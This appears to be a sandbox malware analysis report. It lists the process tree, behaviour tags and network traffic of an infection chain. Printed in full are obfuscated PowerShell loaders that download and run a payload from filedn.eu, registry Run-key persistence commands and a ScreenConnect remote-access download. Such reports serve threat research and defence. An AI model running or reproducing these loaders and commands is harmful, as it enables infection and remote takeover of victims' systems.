pil0Mor,)T es LegGU cae istc.arak.ranoSked/Gjal2 isa0Sten1Lae.0Unfr0Anst1T rk0 Sem1Vaca pshFAnaci ValrRunoeS agfLittoFolkxFors/smal1 Afl3 E.t1Fakt.Topm0';$legalisere=Levnedsmiddelkontrollen 'AadaUVul SCoc.EBor.RMalk- HklaLithGS.cueXyphnEvant';$Sandhedsserumer=Levnedsmiddelkontrollen 'SterhKonftTeglt s,vp oadsCiv : Cor/ ork/Udstf ArciHaanlCon.eVoucdVi nnZero.Sekue Fe uUnab/Syenl Gram slbjKitcMP.ro1UnhyI opit ViriHvl FFj.rCGalaHOndsjPreiYHe aA.eac4DataJAutoNI,reRNeurBFrizYBautBB st3Unid4Stat/ inddHesti Ra fTrusfBeg,e yrirArdueCrennSkams SlarSid k insk Pare UndrProk.SklmdEne.s,elep';$Fascineredes=Levnedsmiddelkontrollen ' San>';$Mirounga=Levnedsmiddelkontrollen ' AnoiBl aeA.tix';$Aspring='Imperceptibly';$Wernas='\Intimidity.Alb';Pedelion (Levnedsmiddelkontrollen '.run$gtheG PenLHan,oSmulbVersaBabalS um:SrloAPiddlBrneKLacuo MdeHs rjOHapllcaz ISkafs rteL.mir eurePer.tOmty=Agro$ Ad EHofdNAntivStrr:R gnaEk,aP aboPFi tD,uspaStruTGrova emm+ P e$adelWE.seeMinirrillNCycaAP.isS');Pedelion (Levnedsmiddelkontrollen 'Pinu$ onfGva el nto.polb.ilbaUpholChe : .ulEPrelO Un.NMet,iAf iSallaM Do S Vic=Ha e$Afbls nsha ennF.atDF mshSeclE Tridkon,SBi.oS Emme,utir vauSepaMMargEMickrBek,. UndSHegePS bhlAnstiDistTcopa(Boos$TinsF me a aglS aadcPreri BlanFellEholorPiale ArodInvaeSimpSIn,u)');Pedelion (Levnedsmiddelkontrollen $Phrenologists);$Sandhedsserumer=$Eonisms[0];$dommerkendelsernes=(Levnedsmiddelkontrollen 'Komp$DizzG,rkilcorrOTrifb obbA,elolTram:Sce ITvedtBoniE .ifrMimiaT,rpTResseE uiLMarkYOkse=AssenSwerePantWReav-GtteOBgebBTri.jConverecoc kaT Pe. 
Am eSPa.tyPo,ts relTSvinEne,rM Epi.Pr,o$GaliSKingH BrniLa nL PadIForpNUncegBewiI');Pedelion ($dommerkendelsernes);Pedelion (Levnedsmiddelkontrollen 'Extr$cistICl.rt .leeNut,r SynaSe ttBrone P.ml CacyChea.D ssHSprieg laasnevd Mase Char GensInad[ An $Glacl We eW odgShedaGruplGatei FfesL.vie NonrNonme Sam] De,=Unit$FemeH Tupest.imMul iHegecYuckiStoirVrdic RaalTi beUnhy1,arm4Cool0');$Seattle=Levnedsmiddelkontrollen 'Porn$airwIMetat,lageRyper DefaPenst lyseBroel LexyHur . ekDCrinoMariwGullnPaaslsacaoFeataQuizdVlt.F,etiiSp ilUnace Fem(Hu o$ narSMurmaPerpnBirgdPorchConneLi edRustsOlivs Rede Nonr ,inuLetfm ShaeIrrarform,Skik$PjevSUn et t no Blor ,oseNemesTimosUnautEnderV nteHaulnR,coe Ca,)';$Storesstrene=$Alkoholiseret;Pedelion (Levnedsmiddelkontrollen 'Bod,$ legGSubjl ,enOArkib R sAOmvelMyel:SharRSl,teSkrolCo ooKichAReguD OpeEArmaDguin2Summ5 Lig4 O r=Cons(LygtTTi,sESer,sintitPike-RevePSikkaFurrTAv.sHHove phe$For.sE,isttjenoDeporIsseE Mi SFjorSP.olTMcfaRstoreSydlNS anES ak)');while (!$Reloaded254) {Pedelion (Levnedsmiddelkontrollen 'Dram$UdbegDat,lEt.noEmanbportaUprclU.by:O erQP ogyUnth= Sys$Unt P BlolfremuSmugkFum kFutue') ;Pedelion $Seattle;Pedelion (Levnedsmiddelkontrollen 'ForkSLuksTNedgA Star AntT um-.ildsOme.L Note Intea.slp Smi Math4');Pedelion (Levnedsmiddelkontrollen 'Libi$GelagCartlUnaco ty BIsotAco eLTrea: MacRBabieJvneLNubioPolyAFcytdTilseAffldFe,t2 Fll5Kamp4Regn=Gill(He,stMandEAvlssN tctTra,-usurPCo,paRi,at Urohpirr Arb$InteSTri.T,gesOShivr R dEjerksPen.S raT S oR BeleFactNR tseBu m)') ;Pedelion (Levnedsmiddelkontrollen ' Ge $InjuGHje lBowloHuspBFlysAOutsLStiv:CyanS numiUdt LAntiIRensc ppeeMannOtrylU udtsMero=Sed,$E.udg ekelmyxoOTotab ipoa ForlOpka:SekrCSantoCry,nAfkvGGesjeStrinAsseI rema C,tlChacN.orsEBrneSNonosRach+Fibe+phot%Be,i$IllgESka.oFluin BemIUbevs UnsmAfpaSVagt. 
T kC inOops u AfvN UfoT') ;$Sandhedsserumer=$Eonisms[$siliceous]}$Diacetylmorphine=330880;$Termined233=29940;Pedelion (Levnedsmiddelkontrollen 'Sena$ ktig tralSalaO ondBAcidaprivlKome:VaabKAppra,pusr Camt deno dehnCrzeNStnna SmuGBommesymfrVa cNHisteS,de Gene=Spir acgRaceeOptaT O,p-SvigcSchnoMe iNTet TBedee.chnnBetrTGian B ll$Bef.s ProTRus oUd.eRHaldE.iggs Gi s indTpatrrTegnE FarNUdtre');Pedelion (Levnedsmiddelkontrollen 'Hunl$g uegSubclRomeo HelbtaktaCauslEl,c:Gu rC foraMetarUdslr eariC yoaMossg,chieSy.olLacreA sks ntrsSo a Sou =Lyse M dv[BushSDampyDarrsGlaitFolkebalsmp.st.U flCDiptoN ncn ydvInteeShanrPolyt utt]Sild:kar : Id Fse erRescoSydkmTer BRei aUnwisRampe tvl6 Ti,4AntiSHjemtl,nsrB.dei Nitn progLapi(Sgel$ParaK annaTamar KontFaaroAdumntopmnFlgeaKrafg BoreTrikr Komn .rieHatp)');Pedelion (Levnedsmiddelkontrollen 'Lted$U prgSlv.l SepOFiguBG,atA abel St.:Spi.v HanaWharAPamfNI dbITuskNSpo G ngisFupmHprogUV rmsbest Misp=Al.o Sml[ xons UdkYDom s SkatFleteGaram Boe. H.eTPrkeETra X PreT Sap.SpytEAfmnneutycSelso asddGrynIUbehn AveGPuff]Rnne:,als:Indba,iazs K,aCEfteI Du i Squ.R jsGF.rfe edT ProsTilttSe vRHumaiSubwnforigno,c(Semi$choncmasha ManRLu eRQuarI CleaKarbG SadESp rLMa oE NorSM biSSmu )');Pedelion (Levnedsmiddelkontrollen 'Pick$Byn.gTubal ByloAntib fora NotL Tak:A siuTomiNPerib KnoUVareR Rene SmaACeruUSekaC Linr QuaaElmatAncyiAndac andaD izlTyndl trayLumi=Op t$S,krvEn,raStapaforenMicrIKa,vn SekgStjlSCu hHOkkeUI ersCep .serisLodeu erbMiliSNon TUnherMaggI UdhnMartGMall( Sh $ StdDD olI slaA Un c amme EliTor,hyUdvilE,spmDrmmOB lir Timp Ku,HZinkIBothn Kone Y,s,.kib$UnmetcentEBe zrToddmperii ocN MolE,kanD Gen2 For3Sira3Komm)');Pedelion $Unbureaucratically;"
    1⤵
    • Blocklisted process makes network request
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3712
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Galgebakkernes.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4868
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antheraea" /t REG_EXPAND_SZ /d "%Abondance% -windowstyle 1 $Cotabulate=(gp -Path 'HKCU:\Software\Lascars\').Svartsiderne;%Abondance% ($Cotabulate)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antheraea" /t REG_EXPAND_SZ /d "%Abondance% -windowstyle 1 $Cotabulate=(gp -Path 'HKCU:\Software\Lascars\').Svartsiderne;%Abondance% ($Cotabulate)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3308
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulciform Sheephead Datovekslen Aliped #><#Unfulfilled Tibbu Domptr Aftereye Blizz #>$Hydropolyp='Stempellovenes';function Matranee($Pseudocyclosis){If ($host.DebuggerEnabled) {$Mineraloliernes=4} for ($Phenanthrene=$Mineraloliernes;;$Phenanthrene+=5){if(!$Pseudocyclosis[$Phenanthrene]) { break }$Quods+=$Pseudocyclosis[$Phenanthrene]}$Quods}function Oratoriske($jennifers){ .($Fugtigvarmes) ($jennifers)}$Sortermulighedens=Matranee 'PerinMisfE pliTSt.l.overWFotoeordsBVe,ec.esoLVirkiThisEOutbnHomoT';$Svinget=Matranee 'StedM.agroK ntzSpooiZayil TollButta.ata/';$Propupa=Matranee 'NotaTSt fl FinsAfst1Spad2';$Reactivations220='suit[F.ydnPen,e FoltNor,. FilSFlagEPotsrBevgVEs.diRetrc SleE RespSchoORatii G.on SkitTikmMPizeaNonpNSupea hrgBlueeUndeRdann]pseu:Tran:negeSVaa ePhrec De UForsrShipiVietT Te yTraspMaanR Pr,oPinuT.ondO .ulCEnkeOElveLTown=H rs$HoroP .orRP,ckOVidrPAnglUF.rrp artA';$Svinget+=Matranee 'Mea 5Adha.Gen.0 el Livs(NairWForpiJenhnUn ad VisoEstrwSupesArti Fe eNRampTGrie Disc1Udsl0Dksk.Jo f0Fixe; Rea DueW.egliHindnAfsk6 Vis4Brmm; S n D.ax Ls,6Best4U ex; Gyn MigrrAfdav Byb:Om a1Soci3Part1Opiu.Ma a0Dag )Rhap L ngGfineeSkolc ailkHexaoCo,d/Tena2 llo0Skov1Shak0Pi,c0S up1Inci0Kons1 rse JvniF Snai inarSquie potfOutdoBofoxF du/Slyn1.isc3Au t1 Sel.Udda0';$vedhnget=Matranee ' MilUe poSr,maEMundRMor.- E sABr pGEtr,e Paan HalT';$Yephede=Matranee 'Rillhfilot psptrefepForss St,:mili/Bioc/ brnfM toi anolOrgaePhotdAfsln Sem. 
SkaeWontuPerg/ istlAutomStorjInt,MMimb1PuppIIl.otC dbiPlusFDirtCPaavHkarrjWitcYFo,fAIns 4Ac iJFoneNInapRO erBAbutYAperBReit3Fleh4kbst/Fagov,undiDefieUncot PrenStana Se mmisv.Galat Milt Kphf';$Kapitulant=Matranee 'Cusc>';$Fugtigvarmes=Matranee 'F,lmiPeixESuk x';$Demotes='Duperede';$Natvgterstat='\Landbrugslovenes201.spr';Oratoriske (Matranee 'Caus$ TragAldeLSys oAsseblyseaYderLDele: ParFRyaeo,eksRw rcl K lyOraiS.otoTBe ye lanl igasS.igE K nsOve SVindy FloGFernt ,je= Ben$MaitE S.rnTic vNett: ahaForbpK biPTrskDPe,fAEl qtFe tASile+Bi.e$Kli N Plea FlotNonrvEulaGCrimt An EKak,rSvarsTragtSat.ANuclT');Oratoriske (Matranee 'Land$TrusGUdl.lAktiO goab StaA ftelPhot:KkkegSeedUForlMLubrmSor I SubH HonJ mi.uBerulWhipE U st SdeSInfe=El,k$S.miYAchrEDidePkabiHDdsdE Co.dReane hav.kuliSB.odP AstLu.deI .ontPri,(Magt$,ociKenqua eplP AffIImpuTscisu Su.lCon ABla NO tiTErst)');Oratoriske (Matranee $Reactivations220);$Yephede=$Gummihjulets[0];$Prepender=(Matranee 'F,st$CeleGKlevLNat,oFng B,ntiAHec.LD ce:PseufGnosiBrugn KriiC traEftelUnde=gr.pNRus,e forWGrov- AfkO ElaBTareJSlineVirkcBerrtCons PentsenclYEmicsCowltMaroEMassmDyst.Bede$EncuSInkaolactrConctUdtrE Ap rBagsMIncoU F.rL kooIFamiGSvunhB tie Ud DEnameBag nfo kS');Oratoriske ($Prepender);Oratoriske (Matranee ' Fre$Ska,FVenti ygnnDom,i Mugahyl.l O e. UndH atheAfruaS mfd De eAfslrBrudsdiso[Cre $skrdvServeblo dKapehInt nSubcgFrade EpitWere] Ker=Stib$ fsvSSkolvBe eiQuidnA prgGeneeSl,tt');$Downsteepy=Matranee ' Pol$RecaFWar i Subnw,iniBenzaPhonlKrys. 
GjoD,elgoBar w,enonBr llVandoParaaC rkds rvFMakuiAngulD ese A t(Nonh$KoksY emaeFarmpOverhInfieInfldF ale.van, pec$U.dePInd.rAssaoelengOverr R naServmDomss SlayDelfs TimtAcceeDd imOutseTjrnrCrysnInsteKontsWass)';$Programsystemernes=$Forlystelsessygt;Oratoriske (Matranee ' .ru$Swi gBenaLAld.o.kieb PriaMisclRedi:DyresLikvAPhylM SigLHy oiFo uVOlavS ttef Appo ProRStadh,ondoGiggl k nDep,ie ca.NDredEAdmiSFa e=Snea(Ind TTvrmEdelpsAport bro-TriupDig A.yttT solHPlad Br,g$ArsePUpasRRe poFul GPer ROpgaABj gMtir SInt YBy,dS Tr tPredESjokm LunEOutsrHol nOptieNongsTus )');while (!$Samlivsforholdenes) {Oratoriske (Matranee 'Goth$Non.gBorglSammoFeltbCi.uaF lolChap:KommHHenryO.erpHelveKonsr C,no eksx Logy enogHjere ftenAp liUdvisBudgeFrum=Slud$NordPIronh,hrie,ectnGkkeaUndenPra,tDoorhKu irMedie Udsn mageFabunP aip P.euNo.etH sss LortBroanS kkiHjo.n B,agSkrys') ;Oratoriske $Downsteepy;Oratoriske (Matranee 'AcidSFoldtFalla NyhrIn,etRefr-HalvSReirlPs,kem trE strpKrel Rhyn4');Oratoriske (Matranee 'Basi$ EmaGVaanlReveo,xciBEvanaAbo LPai.:V ndS AbeAStteMVoldl amfIboolvSha.ST pef depop.osRPuckHSubaoPerflDuodd armEDefiN Aa,eSalgSHenr=Uni.(FeritFgteeHospSsikkt sla- holPAcriAUdbatSwi hAn,u Need$krlip si RDaglOKalfg anRBibeaCaecm GassEremy PlesPu,kT rdeECadmM ypledommRPlannRes e SkeS yth)') ;Oratoriske (Matranee ' Hyp$SkrlG Begl SkuOGranBjoula entLArka:Skuefg nkASkjorKratVK kke skrLPatrAHyd D,andehje RAsa NA.skE Und=sv m$Melog OpbLAfs.Om.taBCafaAAlmel Re :S inUAi fD FinRUdtoE CymdTorgE inLImpisS ineOri rUndenUig,EThanSFors+Eska+Pa,e%Cent$ KnuGmyloU O eM ,alMOverIConcHChi JHoldUAbr.LforsEblanTTanksFot,. SelCMultOElituAmernNonct') ;$Yephede=$Gummihjulets[$Farveladerne]}$Annekteret42=299776;$Tentorial=31265;Oratoriske (Matranee ' Pan$Ecceg Br lAnkeoanliB M lAE islGuts:StikSFardmReplaInteA pheSMul KnonrO Me,VG anePaganO,blESustSBol. 
Su,=Unde Vi GSku.EPlayT Unp-O,bic rroUnmenNe sT AbaeB,azNT.aaT Plo Eje $ C.mPUddaR RatoOctegBdrmRDaarAFo,smBucosFaluYFoyaSFristLdgoe HypML geEMindrDsn NEmbuE ejs');Oratoriske (Matranee ' Ove$ HjegOst lV lko DvabSelvaEjstlhet : UndMEkspaAppes .likTra i,asvn Ca,tUdsviKonddcabb Proj=Shet Mar[Sur.S LgeyPreasVirktSzl.eVandmCard.,rolCSerboTrngn Birv ate Botrrundt,ymn]In e:Pil :BidsFSkinrOpsto premibr BGu daSamasOunceCa,t6Tea 4Sku SSylltNonir ZiriTelen.ajogInda( S,u$ iriSDopimRemia.reeaBenzs Lisk UndoCostv V seSkrinOdiseSpidsi it)');Oratoriske (Matranee 'Fuks$SeptgCantlProvO anbGramARedeL ong:PhrademboI AhaA I tPHer,EL euRho eS Ind1,tal4K ea2Niff Sier=B ck Sha[ AvnsKrn yPrevSS lvTRn eERataMS,te.letuTIndkeRuskxChrotCabi.TeraE IsoNUrt,CGenboB eddDownIToriNSup gWarm]Trim: Sou:Hem aFor,sHaa cProtiUdv,i im.Str,G.lasENegrTEf,eSAv rTKalmRKongiE panPudeg Ka.(Deri$M,liM,ereABortsu fekMomsi HydnDweetWoozI erud dup)');Oratoriske (Matranee 'Moon$Indvg TorlSan oMagnbPillASveslStat:Blo.vAlcaEK lllOs uaLoxotLatheMarqDY te=Berk$ V jDOveriFor a TerpIn,eeTetrr P,lS U,b1 Reg4Unal2 Hyd.BogtSFor UPladBPeptSMasstForeRVindiIn pNQuirgAfre( Fac$Sky,AS ccNbalanTidseSp.tKApp,TContEQuinrTrykeCacotbrug4Ina.2Demi,Vehe$Tankt B,leUvitn.mboTAccooEastREupni OutAhurtLOm l)');Oratoriske $Velated;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4700
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Naborets.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4924
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Meteorologis" /t REG_EXPAND_SZ /d "%Craniosacral% -windowstyle 1 $Excerebration=(gp -Path 'HKCU:\Software\Believes\').Indfoejes;%Craniosacral% ($Excerebration)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3104
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Meteorologis" /t REG_EXPAND_SZ /d "%Craniosacral% -windowstyle 1 $Excerebration=(gp -Path 'HKCU:\Software\Believes\').Indfoejes;%Craniosacral% ($Excerebration)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1604
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 2236
        3⤵
        • Program crash
        PID:1932
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3320 -ip 3320
    1⤵
      PID:1476
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4700 -ip 4700
      1⤵
        PID:4708

      Network

      • flag-us
        DNS
        secure.todesk.help
        dfsvc.exe
        Remote address:
        8.8.8.8:53
        Request
        secure.todesk.help
        IN A
        Response
        secure.todesk.help
        IN A
        185.49.126.73
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 53165
        Content-Type: application/x-ms-application; charset=utf-8
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:34 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Client.manifest
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 6237
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:34 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.ClientService.exe
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 95512
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsBackstageShell.exe
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 61208
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsFileManager.exe.config
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 266
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsClient.exe.config
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 266
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsBackstageShell.exe.config
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 266
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsFileManager.exe
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 81688
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Windows.dll
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 845325
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:35 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.WindowsClient.exe
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 602392
        Content-Type: text/html
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:37 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Client.dll
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Client.dll HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 98983
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:37 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.ClientService.dll
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 31927
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:37 GMT
      • flag-nl
        GET
        https://secure.todesk.help/Bin/ScreenConnect.Core.dll
        dfsvc.exe
        Remote address:
        185.49.126.73:443
        Request
        GET /Bin/ScreenConnect.Core.dll HTTP/1.1
        Host: secure.todesk.help
        Accept-Encoding: gzip
        Response
        HTTP/1.1 200 OK
        Cache-Control: private
        Content-Length: 220396
        Content-Type: text/html
        Content-Encoding: gzip
        Server: Microsoft-HTTPAPI/2.0
        X-Robots-Tag: noindex
        X-Content-Type-Options: nosniff
        Date: Fri, 06 Dec 2024 16:04:37 GMT
      • flag-us
        DNS
        97.17.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        97.17.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        21.49.80.91.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        21.49.80.91.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        73.126.49.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        73.126.49.185.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        23.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        23.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        api.wisescreen.net
        ScreenConnect.ClientService.exe
        Remote address:
        8.8.8.8:53
        Request
        api.wisescreen.net
        IN A
        Response
        api.wisescreen.net
        IN A
        185.49.126.73
      • flag-us
        DNS
        filedn.eu
        msiexec.exe
        Remote address:
        8.8.8.8:53
        Request
        filedn.eu
        IN A
        Response
        filedn.eu
        IN A
        45.131.244.47
      • flag-ch
        GET
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp
